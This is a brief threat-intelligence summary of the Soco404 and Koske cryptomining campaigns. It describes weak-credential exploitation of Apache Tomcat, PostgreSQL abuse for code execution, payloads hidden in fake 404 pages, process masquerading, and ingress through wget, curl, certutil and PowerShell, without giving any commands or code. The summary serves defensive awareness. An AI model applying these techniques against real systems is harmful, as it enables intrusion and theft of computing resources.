Soco404 and Koske malware campaigns target vulnerabilities in cloud environments to deploy cryptocurrency miners. Soco404 deploys malware on both Linux and Windows systems and uses process masquerading to hide malicious activities. The attackers exploit weak credentials in services like Apache Tomcat and abuse PostgreSQL instances for remote code execution. They utilize fake 404 HTML pages for payload delivery and have targeted a legitimate Korean transportation website. Their strategy involves automated scanning for accessible entry points, employing various tools to gain access.
The attacker behind Soco404 appears to be conducting automated scans for exposed services, aiming to exploit any accessible entry point. Their use of a wide range of ingress tools, including Linux utilities like wget and curl, as well as Windows-native tools such as certutil and PowerShell, highlights an opportunistic strategy.
Soco404 targets both Linux and Windows systems, deploying platform-specific malware. They use process masquerading to disguise malicious activity as legitimate system processes.
Collection
[
|
...
]